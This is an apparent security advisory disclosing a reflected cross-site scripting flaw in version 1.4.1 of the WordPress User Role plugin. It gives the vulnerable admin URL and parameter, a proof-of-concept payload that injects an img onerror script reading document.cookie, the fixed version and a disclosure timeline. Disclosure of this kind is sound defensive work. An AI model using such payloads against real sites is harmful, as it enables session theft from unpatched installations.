WordPress User Role 1.4.1 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : User Role Effected Version : 1.4.1 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : In the following field put the payload as below http://localhost/wp-admin/admin.php?page=user-role.php&action=go_pro bws_license_key = “><img src=x onerror=prompt(document.cookie);> Vulnerable Parameter : bws_license_key Type of XSS : Reflected Fixed in : 1.4.2 http://wordpress.org/plugins/user-role/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : The User Role plugin allows you to change wordpress role capabilities. It is a very useful tool when your site has a bunch of visitors or subscribers. The plugin has intuitive and convenient interface so all the site visitors can be easily sorted by roles with a couple of clicks.